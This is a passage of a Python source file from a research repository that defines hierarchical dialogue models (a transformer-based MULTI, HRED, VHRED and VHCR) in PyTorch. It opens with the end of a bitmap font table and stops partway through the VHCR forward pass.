[0, 1, 1, 1, 0],
[0, 0, 1, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0]]
# import time
# container = list()
# print time.strftime("%H:%M")
# for row in glify('Hey tuesday'.upper() + ' '*13 + str(time.strftime("%H:%M")), five):
# tmp = list()
# for item in row:
# tmp.append(str(int(item)))
# tmp = ''.join(tmp).ljust(96, '0')
# tmp += '\n'
# container.append(''.join(tmp))
# container.append(('0'*96) + '\n')
# for row in glify('Lets Dance!'.upper(), ten):
# tmp = list()
# for item in row:
# tmp.append(str(int(item)))
# tmp = ''.join(tmp).ljust(96, '0')
# tmp += '\n'
# container.append(''.join(tmp))
# while len(container) < 16:
# container.append(('0'*96) + '\n')
# print(container)
# container = ''.join(container)
# container = container.replace('0', '-')
# container = container.replace('1', '#')
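The commented-out demo above depends on a `glify` helper that is not defined in this file. A stand-alone sketch of the same idea — concatenating glyph rows horizontally and printing them with `#`/`-` — using a small excerpt of the `five` font (`render` and `five_stub` are names introduced here, and `glify`'s real signature may differ):

```python
def render(word, font):
    # Concatenate the glyph rows of each character side by side,
    # with one blank column between glyphs.
    rows = len(next(iter(font.values())))
    out = [[] for _ in range(rows)]
    for ch in word:
        glyph = font.get(ch, font[' '])
        for r in range(rows):
            out[r].extend(glyph[r] + [0])
    return out

# Excerpt of the 5-row font defined above
five_stub = {'H': [[1, 0, 1], [1, 0, 1], [1, 1, 1], [1, 0, 1], [1, 0, 1]],
             'I': [[1, 1, 1], [0, 1, 0], [0, 1, 0], [0, 1, 0], [1, 1, 1]],
             ' ': [[0], [0], [0], [0], [0]]}

for row in render('HI', five_stub):
    print(''.join('#' if v else '-' for v in row))
```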


# model/models.py (text-machine-lab/HierarchicalTransformer, MIT)
import torch
import torch.nn as nn
from utils import to_var, pad, normal_kl_div, normal_logpdf, bag_of_words_loss, to_bow, EOS_ID, calc_pos
import layers
import numpy as np
import sys
sys.path.append('..') # ASSUMPTION - THIS MODULE LIES IN DIR NEXT TO TRANSFORMER DIR
import random
from transformer.Models import Transformer, MultiModel, Encoder, GRUEncoder, MultiHeadAttentionGRUDecoder
from transformer.Translator import Translator
from transformer.Models import batched_index_select
from model.utils.vocab import SOS_ID
VariationalModels = ['VHRED', 'VHCR']
def add_sos(x):
sos_id = torch.tensor(SOS_ID).to(x.device).view(1, 1).expand(x.shape[0], -1)
gold = torch.cat([sos_id, x], 1)
return gold
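`add_sos` above prepends the start-of-sequence token to every row of a batch, and `calc_pos` (imported from `utils`) assigns positions with padding masked out. A pure-Python sketch of both behaviors on plain lists — the stand-in ids `SOS_ID_` and `PAD_ID_` are assumptions, and `calc_pos`'s actual implementation may differ in detail:

```python
SOS_ID_ = 1   # assumption: stands in for model.utils.vocab.SOS_ID
PAD_ID_ = 0   # assumption: padding token id

def add_sos_rows(batch):
    """List-based analogue of add_sos: prepend the SOS id to every row."""
    return [[SOS_ID_] + row for row in batch]

def calc_pos_rows(batch):
    """List-based analogue of calc_pos: 1-based positions, 0 for padding."""
    return [[i + 1 if tok != PAD_ID_ else 0 for i, tok in enumerate(row)]
            for row in batch]

print(add_sos_rows([[5, 6], [7, 8]]))         # [[1, 5, 6], [1, 7, 8]]
print(calc_pos_rows([[5, 6, 0], [7, 0, 0]]))  # [[1, 2, 0], [1, 0, 0]]
```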
# class TRANSFORMER(nn.Module):
# def __init__(self, config):
# super(TRANSFORMER, self).__init__()
# self.config = config
# self.transformer = Transformer(config.vocab_size, config.vocab_size, config.max_history, config.encoder_hidden_size,
# config.encoder_hidden_size, config.encoder_hidden_size * 4, unet=config.unet,
# tgt_emb_prj_weight_sharing=False)
#
# self.translator = Translator(model=self.transformer, beam_size=config.beam_size, max_seq_len=config.gen_response_len)
#
# def forward(self, histories, segments, responses, decode=False):
# """
# Args:
# histories: (LongTensor) [batch_size, convo_len, seq_len]
# responses: (LongTensor) [batch_size, seq_len]
# Return:
# decoder_outputs: (FloatTensor)
# - train: [batch_size, seq_len, vocab_size]
# - eval: [batch_size, seq_len]
# """
#
# # calculate position vectors to locate each token
# # padding tokens set to zero
#
# # HERE WE ADD GO TOKEN
# responses = add_sos(responses)
#
# history_pos = calc_pos(histories)
# response_pos = calc_pos(responses)
#
# logits = self.transformer(histories, history_pos, responses, response_pos, flat_logits=False, src_segs=segments)
#
# if not decode:
# return logits
# else:
# batch_hyp, batch_logits = self.translator.translate_batch(histories, history_pos, src_segs=segments)
# return batch_hyp
#
# def generate(self, context, sentence_length, n_context):
# raise NotImplementedError('Generate not implemented!')
class MULTI(nn.Module):
def __init__(self, config):
super(MULTI, self).__init__()
self.config = config
#self.encoder = GRUEncoder(config.vocab_size, config.encoder_hidden_size)
# self.encoder = Encoder(
# n_src_vocab=config.vocab_size, len_max_seq=300,
# d_word_vec=config.embedding_size, n_layers=6, n_head=8, d_k=64, d_v=64, d_model=config.encoder_hidden_size,
# d_inner=config.encoder_hidden_size * 4)
#self.decoder = MultiHeadAttentionGRUDecoder(config.vocab_size, config.decoder_hidden_size, dropout=config.dropout)
# self.decoder = layers.DecoderRNN(config.vocab_size,
# config.embedding_size,
# config.decoder_hidden_size,
# config.rnncell,
# config.num_layers,
# config.dropout,
# config.word_drop,
# config.max_unroll,
# config.sample,
# config.temperature,
# config.beam_size)
#
# self.context2decoder = layers.FeedForward(config.context_size,
# config.num_layers * config.decoder_hidden_size,
# num_layers=1,
# activation=config.activation)
#self.tgt_word_prj = nn.Linear(config.decoder_hidden_size, config.vocab_size, bias=False)
# TODO target weight sharing is disabled!
self.model = MultiModel(config.vocab_size, config.vocab_size, config.max_history, config.embedding_size, config.decoder_hidden_size,
config.decoder_hidden_size * 4, encoder=config.encoder_type,
decoder=config.decoder_type, n_layers=config.num_layers, tgt_emb_prj_weight_sharing=False,
per_layer_decoder_attention=config.decoder_per_layer_attention)
self.translator = Translator(model=self.model, beam_size=config.beam_size,
max_seq_len=config.gen_response_len)
# if config.tie_embedding:
# #self.decoder.embedding.weight = self.encoder.src_word_emb.weight
# #self.decoder.out.weight = self.decoder.embedding.weight
#
# self.decoder.embedding.weight = self.encoder.src_word_emb.weight
# #self.tgt_word_prj.weight = self.decoder.tgt_word_emb.weight
# #self.x_logit_scale = (config.decoder_hidden_size ** -0.5)
    def forward(self, histories, segments, responses, decode=False):
        """
        Args:
            histories: (LongTensor) [batch_size, seq_len] flattened dialogue histories
            segments: (LongTensor) [batch_size, seq_len] segment ids for each history token
            responses: (LongTensor) [batch_size, seq_len] gold responses
        Return:
            - train (decode=False): (FloatTensor) logits [batch_size, seq_len, vocab_size]
            - decode=True: list of generated token-id sequences, one per batch element
        """
responses = add_sos(responses)
history_pos = calc_pos(histories)
response_pos = calc_pos(responses)
logits = self.model(histories, history_pos, responses, response_pos, flat_logits=False, src_segs=segments)
if not decode:
return logits
else:
#TODO go back to topk decoding
#batch_hyp = self.translator.sample_topk_batch(histories, history_pos, src_segs=segments)
batch_hyp, batch_scores = self.translator.translate_batch(histories, history_pos, src_segs=segments)
return [sent[0] for sent in batch_hyp] # torch.LongTensor(batch_hyp).squeeze(1)
# history_length = (histories != 0).sum(1) - 1
#
# history_pos = calc_pos(histories)
#
# encoder_outputs, = self.encoder(histories, history_pos, src_segs=segments, return_attns=False)
# #encoder_outputs, = self.encoder(histories)
# encoder_hidden = batched_index_select(encoder_outputs, 1, history_length).unsqueeze(1)
#
# # [num_layers, batch_size, hidden_size]
# decoder_init = encoder_hidden.view(self.config.num_layers, -1, self.config.decoder_hidden_size)
#
# history_pos = calc_pos(histories)
#
# if not decode:
#
# target_sentences = add_sos(target_sentences)[:, :-1]
# #
# # decoder_outputs, = self.decoder(target_sentences, history_pos, histories, decoder_init)
# # seq_logit = self.tgt_word_prj(decoder_outputs)
# #
# # return seq_logit
#
# decoder_outputs = self.decoder(target_sentences,
# init_h=decoder_init,
# decode=decode)
# return decoder_outputs
#
# else:
# prediction, final_score, length = self.decoder.beam_decode(init_h=decoder_init)
#
# return prediction
#
# batch_hyp, batch_logits = self.translator.translate_batch(histories, history_pos, src_segs=segments)
# return batch_hyp
# def generate(self, context, sentence_length, n_context):
#
#
# # TODO allow model to generate?
# raise NotImplementedError('Generate not implemented!')
#
# # context: [batch_size, n_context, seq_len]
# batch_size = context.size(0)
# # n_context = context.size(1)
# samples = []
#
# # Run for context
# context_hidden=None
# for i in range(n_context):
# # encoder_outputs: [batch_size, seq_len, hidden_size * direction]
# # encoder_hidden: [num_layers * direction, batch_size, hidden_size]
# encoder_outputs, encoder_hidden = self.encoder(context[:, i, :],
# sentence_length[:, i])
#
# encoder_hidden = encoder_hidden.transpose(1, 0).contiguous().view(batch_size, -1)
# # context_outputs: [batch_size, 1, context_hidden_size * direction]
# # context_hidden: [num_layers * direction, batch_size, context_hidden_size]
# context_outputs, context_hidden = self.context_encoder.step(encoder_hidden,
# context_hidden)
#
# # Run for generation
# for j in range(self.config.n_sample_step):
# # context_outputs: [batch_size, context_hidden_size * direction]
# context_outputs = context_outputs.squeeze(1)
# decoder_init = self.context2decoder(context_outputs)
# decoder_init = decoder_init.view(self.decoder.num_layers, -1, self.decoder.hidden_size)
#
# prediction, final_score, length = self.decoder.beam_decode(init_h=decoder_init)
# # prediction: [batch_size, seq_len]
# prediction = prediction[:, 0, :]
# # length: [batch_size]
# length = [l[0] for l in length]
# length = to_var(torch.LongTensor(length))
# samples.append(prediction)
#
# encoder_outputs, encoder_hidden = self.encoder(prediction,
# length)
#
# encoder_hidden = encoder_hidden.transpose(1, 0).contiguous().view(batch_size, -1)
#
# context_outputs, context_hidden = self.context_encoder.step(encoder_hidden,
# context_hidden)
#
# samples = torch.stack(samples, 1)
# return samples
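HRED below encodes every sentence of every conversation in one flat batch, then uses cumulative conversation-length offsets (`torch.cumsum`) plus padding to regroup the per-sentence hidden states by conversation. A list-based sketch of that regrouping step — no torch, `regroup` is a name introduced here, and the vectors are illustrative stand-ins for hidden states:

```python
def regroup(flat, conv_lens):
    # flat: one vector per sentence, in conversation order
    # conv_lens: number of sentences in each conversation
    max_len = max(conv_lens)
    pad_vec = [0] * len(flat[0])        # zero-pad shorter conversations
    out, start = [], 0
    for l in conv_lens:
        out.append(flat[start:start + l] + [pad_vec] * (max_len - l))
        start += l                       # running offset, like torch.cumsum
    return out

print(regroup([[1], [2], [3]], [2, 1]))  # [[[1], [2]], [[3], [0]]]
```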
class HRED(nn.Module):
def __init__(self, config):
super(HRED, self).__init__()
self.config = config
self.encoder = layers.EncoderRNN(config.vocab_size,
config.embedding_size,
config.encoder_hidden_size,
config.rnn,
1,
config.bidirectional,
config.dropout)
context_input_size = (1
* config.encoder_hidden_size
* self.encoder.num_directions)
self.context_encoder = layers.ContextRNN(context_input_size,
config.context_size,
config.rnn,
1,
config.dropout)
self.decoder = layers.DecoderRNN(config.vocab_size,
config.embedding_size,
config.decoder_hidden_size,
config.rnncell,
1,
config.dropout,
config.word_drop,
config.max_unroll,
config.sample,
config.temperature,
config.beam_size)
self.context2decoder = layers.FeedForward(config.context_size,
config.decoder_hidden_size,
num_layers=1,
activation=config.activation)
if config.tie_embedding:
self.decoder.embedding = self.encoder.embedding
def forward(self, input_sentences, input_sentence_length,
input_conversation_length, target_sentences, decode=False):
"""
Args:
input_sentences: (Variable, LongTensor) [num_sentences, seq_len]
target_sentences: (Variable, LongTensor) [num_sentences, seq_len]
Return:
decoder_outputs: (Variable, FloatTensor)
- train: [batch_size, seq_len, vocab_size]
- eval: [batch_size, seq_len]
"""
num_sentences = input_sentences.size(0)
max_len = input_conversation_length.data.max().item()
# encoder_outputs: [num_sentences, max_source_length, hidden_size * direction]
# encoder_hidden: [num_layers * direction, num_sentences, hidden_size]
encoder_outputs, encoder_hidden = self.encoder(input_sentences,
input_sentence_length)
# encoder_hidden: [num_sentences, num_layers * direction * hidden_size]
encoder_hidden = encoder_hidden.transpose(1, 0).contiguous().view(num_sentences, -1)
# pad and pack encoder_hidden
start = torch.cumsum(torch.cat((to_var(input_conversation_length.data.new(1).zero_()),
input_conversation_length[:-1])), 0)
# encoder_hidden: [batch_size, max_len, num_layers * direction * hidden_size]
encoder_hidden = torch.stack([pad(encoder_hidden.narrow(0, s, l), max_len)
for s, l in zip(start.data.tolist(),
input_conversation_length.data.tolist())], 0)
# context_outputs: [batch_size, max_len, context_size]
context_outputs, context_last_hidden = self.context_encoder(encoder_hidden,
input_conversation_length)
# flatten outputs
# context_outputs: [num_sentences, context_size]
context_outputs = torch.cat([context_outputs[i, :l, :]
for i, l in enumerate(input_conversation_length.data)])
# project context_outputs to decoder init state
decoder_init = self.context2decoder(context_outputs)
# [num_layers, batch_size, hidden_size]
decoder_init = decoder_init.view(1, -1, self.decoder.hidden_size)
# train: [batch_size, seq_len, vocab_size]
# eval: [batch_size, seq_len]
if not decode:
decoder_outputs = self.decoder(target_sentences,
init_h=decoder_init,
decode=decode)
return decoder_outputs
else:
# decoder_outputs = self.decoder(target_sentences,
# init_h=decoder_init,
# decode=decode)
# return decoder_outputs.unsqueeze(1)
# prediction: [batch_size, beam_size, max_unroll]
prediction, final_score, length = self.decoder.beam_decode(init_h=decoder_init)
# Get top prediction only
# [batch_size, max_unroll]
# prediction = prediction[:, 0]
# [batch_size, beam_size, max_unroll]
return prediction
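The forward pass above flattens every sentence of the batch onto one axis, then uses cumulative-sum start offsets, `narrow`, and `pad` to slice each conversation back out and pad it to the longest one. A pure-Python sketch of that bookkeeping (plain lists standing in for tensors; `split_and_pad` is a hypothetical name):

```python
def split_and_pad(flat, lengths, pad_value=0):
    """Slice a flat list of per-sentence encodings back into
    conversations and pad each one to the longest conversation."""
    # start offsets: cumulative sum with a leading zero, mirroring
    # torch.cumsum(torch.cat((zero, lengths[:-1])), 0) above
    starts, acc = [], 0
    for l in lengths:
        starts.append(acc)
        acc += l
    max_len = max(lengths)
    padded = []
    for s, l in zip(starts, lengths):
        conv = flat[s:s + l]                       # narrow(0, s, l)
        conv = conv + [pad_value] * (max_len - l)  # pad(conv, max_len)
        padded.append(conv)
    return padded

# six sentence encodings from conversations of length 3, 1, 2
batch = split_and_pad(list("abcdef"), [3, 1, 2], pad_value="_")
# → [['a', 'b', 'c'], ['d', '_', '_'], ['e', 'f', '_']]
```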
def generate(self, context, sentence_length, n_context):
# context: [batch_size, n_context, seq_len]
batch_size = context.size(0)
# n_context = context.size(1)
samples = []
# Run for context
context_hidden = None
for i in range(n_context):
# encoder_outputs: [batch_size, seq_len, hidden_size * direction]
# encoder_hidden: [num_layers * direction, batch_size, hidden_size]
encoder_outputs, encoder_hidden = self.encoder(context[:, i, :],
sentence_length[:, i])
encoder_hidden = encoder_hidden.transpose(1, 0).contiguous().view(batch_size, -1)
# context_outputs: [batch_size, 1, context_hidden_size * direction]
# context_hidden: [num_layers * direction, batch_size, context_hidden_size]
context_outputs, context_hidden = self.context_encoder.step(encoder_hidden,
context_hidden)
# Run for generation
for j in range(self.config.n_sample_step):
# context_outputs: [batch_size, context_hidden_size * direction]
context_outputs = context_outputs.squeeze(1)
decoder_init = self.context2decoder(context_outputs)
decoder_init = decoder_init.view(self.decoder.num_layers, -1, self.decoder.hidden_size)
prediction, final_score, length = self.decoder.beam_decode(init_h=decoder_init)
# prediction: [batch_size, seq_len]
prediction = prediction[:, 0, :]
# length: [batch_size]
length = [l[0] for l in length]
length = to_var(torch.LongTensor(length))
samples.append(prediction)
encoder_outputs, encoder_hidden = self.encoder(prediction,
length)
encoder_hidden = encoder_hidden.transpose(1, 0).contiguous().view(batch_size, -1)
context_outputs, context_hidden = self.context_encoder.step(encoder_hidden,
context_hidden)
samples = torch.stack(samples, 1)
return samples
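`generate()` above rolls the model forward one utterance at a time: each decoded sentence is re-encoded and fed to the context RNN as the next step's input. Stripped of the model details, the control flow is a simple feedback loop (toy step function, hypothetical helper name):

```python
def autoregressive_sample(step_fn, state, n_steps):
    """Roll a model forward: each step consumes the previous output,
    mirroring generate() above, where the decoded sentence is fed
    back through the encoder and the context RNN."""
    samples = []
    out = None
    for _ in range(n_steps):
        out, state = step_fn(out, state)
        samples.append(out)
    return samples

# toy step: a hypothetical "model" that just emits its state counter
steps = autoregressive_sample(lambda prev, s: (s, s + 1), 0, 3)
# → [0, 1, 2]
```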
class VHRED(nn.Module):
def __init__(self, config):
super(VHRED, self).__init__()
self.config = config
self.encoder = layers.EncoderRNN(config.vocab_size,
config.embedding_size,
config.encoder_hidden_size,
config.rnn,
config.num_layers,
config.bidirectional,
config.dropout)
context_input_size = (config.num_layers
* config.encoder_hidden_size
* self.encoder.num_directions)
self.context_encoder = layers.ContextRNN(context_input_size,
config.context_size,
config.rnn,
config.num_layers,
config.dropout)
self.decoder = layers.DecoderRNN(config.vocab_size,
config.embedding_size,
config.decoder_hidden_size,
config.rnncell,
config.num_layers,
config.dropout,
config.word_drop,
config.max_unroll,
config.sample,
config.temperature,
config.beam_size)
self.context2decoder = layers.FeedForward(config.context_size + config.z_sent_size,
config.num_layers * config.decoder_hidden_size,
num_layers=1,
activation=config.activation)
self.softplus = nn.Softplus()
self.prior_h = layers.FeedForward(config.context_size,
config.context_size,
num_layers=2,
hidden_size=config.context_size,
activation=config.activation)
self.prior_mu = nn.Linear(config.context_size,
config.z_sent_size)
self.prior_var = nn.Linear(config.context_size,
config.z_sent_size)
self.posterior_h = layers.FeedForward(config.encoder_hidden_size * self.encoder.num_directions * config.num_layers + config.context_size,
config.context_size,
num_layers=2,
hidden_size=config.context_size,
activation=config.activation)
self.posterior_mu = nn.Linear(config.context_size,
config.z_sent_size)
self.posterior_var = nn.Linear(config.context_size,
config.z_sent_size)
if config.tie_embedding:
self.decoder.embedding = self.encoder.embedding
if config.bow:
self.bow_h = layers.FeedForward(config.z_sent_size,
config.decoder_hidden_size,
num_layers=1,
hidden_size=config.decoder_hidden_size,
activation=config.activation)
self.bow_predict = nn.Linear(config.decoder_hidden_size, config.vocab_size)
def prior(self, context_outputs):
# Context dependent prior
h_prior = self.prior_h(context_outputs)
mu_prior = self.prior_mu(h_prior)
var_prior = self.softplus(self.prior_var(h_prior))
return mu_prior, var_prior
def posterior(self, context_outputs, encoder_hidden):
h_posterior = self.posterior_h(torch.cat([context_outputs, encoder_hidden], 1))
mu_posterior = self.posterior_mu(h_posterior)
var_posterior = self.softplus(self.posterior_var(h_posterior))
return mu_posterior, var_posterior
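Both `prior` and `posterior` above pass the raw variance head through a softplus so the predicted variance stays strictly positive, and `forward` later samples with the reparameterization trick `z = mu + sqrt(var) * eps`. A scalar sketch of both pieces:

```python
import math
import random

def softplus(x):
    # smooth approximation of max(0, x); always strictly positive,
    # so it is a safe parameterization for a variance
    return math.log1p(math.exp(x))

def reparameterize(mu, var, rng):
    # z = mu + sigma * eps with eps ~ N(0, 1); the randomness lives
    # in eps, so gradients can flow through mu and var
    eps = rng.gauss(0.0, 1.0)
    return mu + math.sqrt(var) * eps

var = softplus(-3.0)   # small but strictly positive
z = reparameterize(0.5, var, random.Random(0))
```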
def compute_bow_loss(self, target_conversations):
target_bow = np.stack([to_bow(sent, self.config.vocab_size) for conv in target_conversations for sent in conv], axis=0)
target_bow = to_var(torch.FloatTensor(target_bow))
bow_logits = self.bow_predict(self.bow_h(self.z_sent))
bow_loss = bag_of_words_loss(bow_logits, target_bow)
return bow_loss
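`compute_bow_loss` depends on a `to_bow` helper defined elsewhere in the repository; presumably it maps a sentence of token ids to a vocab-sized count vector. A minimal sketch under that assumption:

```python
def to_bow(sentence_ids, vocab_size):
    """Hypothetical bag-of-words target: per-id counts, ignoring
    any ids outside the vocabulary (e.g. padding markers)."""
    bow = [0.0] * vocab_size
    for idx in sentence_ids:
        if 0 <= idx < vocab_size:
            bow[idx] += 1.0
    return bow

bow = to_bow([1, 1, 3], 5)
# → [0.0, 2.0, 0.0, 1.0, 0.0]
```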
def forward(self, sentences, sentence_length,
input_conversation_length, target_sentences, decode=False):
"""
Args:
sentences: (Variable, LongTensor) [num_sentences + batch_size, seq_len]
target_sentences: (Variable, LongTensor) [num_sentences, seq_len]
Return:
decoder_outputs: (Variable, FloatTensor)
- train: [batch_size, seq_len, vocab_size]
- eval: [batch_size, seq_len]
"""
batch_size = input_conversation_length.size(0)
num_sentences = sentences.size(0) - batch_size
max_len = input_conversation_length.data.max().item()
# encoder_outputs: [num_sentences + batch_size, max_source_length, hidden_size]
# encoder_hidden: [num_layers * direction, num_sentences + batch_size, hidden_size]
encoder_outputs, encoder_hidden = self.encoder(sentences,
sentence_length)
# encoder_hidden: [num_sentences + batch_size, num_layers * direction * hidden_size]
encoder_hidden = encoder_hidden.transpose(
1, 0).contiguous().view(num_sentences + batch_size, -1)
# pad and pack encoder_hidden
start = torch.cumsum(torch.cat((to_var(input_conversation_length.data.new(1).zero_()),
input_conversation_length[:-1] + 1)), 0)
# encoder_hidden: [batch_size, max_len + 1, num_layers * direction * hidden_size]
encoder_hidden = torch.stack([pad(encoder_hidden.narrow(0, s, l + 1), max_len + 1)
for s, l in zip(start.data.tolist(),
input_conversation_length.data.tolist())], 0)
# encoder_hidden_inference: [batch_size, max_len, num_layers * direction * hidden_size]
encoder_hidden_inference = encoder_hidden[:, 1:, :]
encoder_hidden_inference_flat = torch.cat(
[encoder_hidden_inference[i, :l, :] for i, l in enumerate(input_conversation_length.data)])
# encoder_hidden_input: [batch_size, max_len, num_layers * direction * hidden_size]
encoder_hidden_input = encoder_hidden[:, :-1, :]
# context_outputs: [batch_size, max_len, context_size]
context_outputs, context_last_hidden = self.context_encoder(encoder_hidden_input,
input_conversation_length)
# flatten outputs
# context_outputs: [num_sentences, context_size]
context_outputs = torch.cat([context_outputs[i, :l, :]
for i, l in enumerate(input_conversation_length.data)])
mu_prior, var_prior = self.prior(context_outputs)
eps = to_var(torch.randn((num_sentences, self.config.z_sent_size)))
if not decode:
mu_posterior, var_posterior = self.posterior(
context_outputs, encoder_hidden_inference_flat)
z_sent = mu_posterior + torch.sqrt(var_posterior) * eps
log_q_zx = normal_logpdf(z_sent, mu_posterior, var_posterior).sum()
log_p_z = normal_logpdf(z_sent, mu_prior, var_prior).sum()
# kl_div: [num_sentences]
kl_div = normal_kl_div(mu_posterior, var_posterior,
mu_prior, var_prior)
kl_div = torch.sum(kl_div)
else:
z_sent = mu_prior + torch.sqrt(var_prior) * eps
kl_div = None
log_p_z = normal_logpdf(z_sent, mu_prior, var_prior).sum()
log_q_zx = None
self.z_sent = z_sent
latent_context = torch.cat([context_outputs, z_sent], 1)
decoder_init = self.context2decoder(latent_context)
decoder_init = decoder_init.view(-1,
self.decoder.num_layers,
self.decoder.hidden_size)
decoder_init = decoder_init.transpose(1, 0).contiguous()
# train: [batch_size, seq_len, vocab_size]
# eval: [batch_size, seq_len]
if not decode:
decoder_outputs = self.decoder(target_sentences,
init_h=decoder_init,
decode=decode)
return decoder_outputs, kl_div, log_p_z, log_q_zx
else:
# prediction: [batch_size, beam_size, max_unroll]
prediction, final_score, length = self.decoder.beam_decode(init_h=decoder_init)
return prediction, kl_div, log_p_z, log_q_zx
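The `kl_div` term above is the closed-form KL divergence between two diagonal Gaussians, computed per dimension and summed. A scalar sketch consistent with the way `normal_kl_div` is called in `forward`:

```python
import math

def normal_kl_div(mu_q, var_q, mu_p, var_p):
    """KL(N(mu_q, var_q) || N(mu_p, var_p)) for one dimension:
    0.5 * log(var_p / var_q) + (var_q + (mu_q - mu_p)^2) / (2 var_p) - 0.5
    Sum over dimensions for a diagonal Gaussian, as the models do."""
    return (0.5 * math.log(var_p / var_q)
            + (var_q + (mu_q - mu_p) ** 2) / (2.0 * var_p)
            - 0.5)

# KL of a distribution with itself is zero
assert normal_kl_div(0.3, 1.7, 0.3, 1.7) == 0.0
```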
def generate(self, context, sentence_length, n_context):
# context: [batch_size, n_context, seq_len]
batch_size = context.size(0)
# n_context = context.size(1)
samples = []
# Run for context
context_hidden = None
for i in range(n_context):
# encoder_outputs: [batch_size, seq_len, hidden_size * direction]
# encoder_hidden: [num_layers * direction, batch_size, hidden_size]
encoder_outputs, encoder_hidden = self.encoder(context[:, i, :],
sentence_length[:, i])
encoder_hidden = encoder_hidden.transpose(1, 0).contiguous().view(batch_size, -1)
# context_outputs: [batch_size, 1, context_hidden_size * direction]
# context_hidden: [num_layers * direction, batch_size, context_hidden_size]
context_outputs, context_hidden = self.context_encoder.step(encoder_hidden,
context_hidden)
# Run for generation
for j in range(self.config.n_sample_step):
# context_outputs: [batch_size, context_hidden_size * direction]
context_outputs = context_outputs.squeeze(1)
mu_prior, var_prior = self.prior(context_outputs)
eps = to_var(torch.randn((batch_size, self.config.z_sent_size)))
z_sent = mu_prior + torch.sqrt(var_prior) * eps
latent_context = torch.cat([context_outputs, z_sent], 1)
decoder_init = self.context2decoder(latent_context)
decoder_init = decoder_init.view(self.decoder.num_layers, -1, self.decoder.hidden_size)
if self.config.sample:
prediction = self.decoder(None, decoder_init, decode=True)
p = prediction.data.cpu().numpy()
length = torch.from_numpy(np.where(p == EOS_ID)[1])
else:
prediction, final_score, length = self.decoder.beam_decode(init_h=decoder_init)
# prediction: [batch_size, seq_len]
prediction = prediction[:, 0, :]
# length: [batch_size]
length = [l[0] for l in length]
length = to_var(torch.LongTensor(length))
samples.append(prediction)
encoder_outputs, encoder_hidden = self.encoder(prediction,
length)
encoder_hidden = encoder_hidden.transpose(1, 0).contiguous().view(batch_size, -1)
context_outputs, context_hidden = self.context_encoder.step(encoder_hidden,
context_hidden)
samples = torch.stack(samples, 1)
return samples
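`log_p_z` and `log_q_zx` in `forward` above are Gaussian log densities (`normal_logpdf`, defined elsewhere). Per dimension, the log density of N(mu, var) is -0.5 * (log 2π + log var + (x - mu)² / var); a scalar sketch:

```python
import math

def normal_logpdf(x, mu, var):
    # log N(x; mu, var) for one dimension; sum over dimensions for a
    # diagonal Gaussian, as the models above do with .sum()
    return -0.5 * (math.log(2.0 * math.pi) + math.log(var)
                   + (x - mu) ** 2 / var)
```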
class VHCR(nn.Module):
def __init__(self, config):
super(VHCR, self).__init__()
self.config = config
self.encoder = layers.EncoderRNN(config.vocab_size,
config.embedding_size,
config.encoder_hidden_size,
config.rnn,
config.num_layers,
config.bidirectional,
config.dropout)
context_input_size = (config.num_layers
* config.encoder_hidden_size
* self.encoder.num_directions + config.z_conv_size)
self.context_encoder = layers.ContextRNN(context_input_size,
config.context_size,
config.rnn,
config.num_layers,
config.dropout)
self.unk_sent = nn.Parameter(torch.randn(context_input_size - config.z_conv_size))
self.z_conv2context = layers.FeedForward(config.z_conv_size,
config.num_layers * config.context_size,
num_layers=1,
activation=config.activation)
context_input_size = (config.num_layers
* config.encoder_hidden_size
* self.encoder.num_directions)
self.context_inference = layers.ContextRNN(context_input_size,
config.context_size,
config.rnn,
config.num_layers,
config.dropout,
bidirectional=True)
self.decoder = layers.DecoderRNN(config.vocab_size,
config.embedding_size,
config.decoder_hidden_size,
config.rnncell,
config.num_layers,
config.dropout,
config.word_drop,
config.max_unroll,
config.sample,
config.temperature,
config.beam_size)
self.context2decoder = layers.FeedForward(config.context_size + config.z_sent_size + config.z_conv_size,
config.num_layers * config.decoder_hidden_size,
num_layers=1,
activation=config.activation)
self.softplus = nn.Softplus()
self.conv_posterior_h = layers.FeedForward(config.num_layers * self.context_inference.num_directions * config.context_size,
config.context_size,
num_layers=2,
hidden_size=config.context_size,
activation=config.activation)
self.conv_posterior_mu = nn.Linear(config.context_size,
config.z_conv_size)
self.conv_posterior_var = nn.Linear(config.context_size,
config.z_conv_size)
self.sent_prior_h = layers.FeedForward(config.context_size + config.z_conv_size,
config.context_size,
num_layers=1,
hidden_size=config.z_sent_size,
activation=config.activation)
self.sent_prior_mu = nn.Linear(config.context_size,
config.z_sent_size)
self.sent_prior_var = nn.Linear(config.context_size,
config.z_sent_size)
self.sent_posterior_h = layers.FeedForward(config.z_conv_size + config.encoder_hidden_size * self.encoder.num_directions * config.num_layers + config.context_size,
config.context_size,
num_layers=2,
hidden_size=config.context_size,
activation=config.activation)
self.sent_posterior_mu = nn.Linear(config.context_size,
config.z_sent_size)
self.sent_posterior_var = nn.Linear(config.context_size,
config.z_sent_size)
if config.tie_embedding:
self.decoder.embedding = self.encoder.embedding
def conv_prior(self):
# Standard gaussian prior
return to_var(torch.FloatTensor([0.0])), to_var(torch.FloatTensor([1.0]))
def conv_posterior(self, context_inference_hidden):
h_posterior = self.conv_posterior_h(context_inference_hidden)
mu_posterior = self.conv_posterior_mu(h_posterior)
var_posterior = self.softplus(self.conv_posterior_var(h_posterior))
return mu_posterior, var_posterior
def sent_prior(self, context_outputs, z_conv):
# Context dependent prior
h_prior = self.sent_prior_h(torch.cat([context_outputs, z_conv], dim=1))
mu_prior = self.sent_prior_mu(h_prior)
var_prior = self.softplus(self.sent_prior_var(h_prior))
return mu_prior, var_prior
def sent_posterior(self, context_outputs, encoder_hidden, z_conv):
h_posterior = self.sent_posterior_h(torch.cat([context_outputs, encoder_hidden, z_conv], 1))
mu_posterior = self.sent_posterior_mu(h_posterior)
var_posterior = self.softplus(self.sent_posterior_var(h_posterior))
return mu_posterior, var_posterior
def forward(self, sentences, sentence_length,
input_conversation_length, target_sentences, decode=False):
"""
Args:
sentences: (Variable, LongTensor) [num_sentences + batch_size, seq_len]
target_sentences: (Variable, LongTensor) [num_sentences, seq_len]
Return:
decoder_outputs: (Variable, FloatTensor)
- train: [batch_size, seq_len, vocab_size]
- eval: [batch_size, seq_len]
"""
batch_size = input_conversation_length.size(0)
num_sentences = sentences.size(0) - batch_size
max_len = input_conversation_length.data.max().item()
# encoder_outputs: [num_sentences + batch_size, max_source_length, hidden_size]
# encoder_hidden: [num_layers * direction, num_sentences + batch_size, hidden_size]
encoder_outputs, encoder_hidden = self.encoder(sentences,
sentence_length)
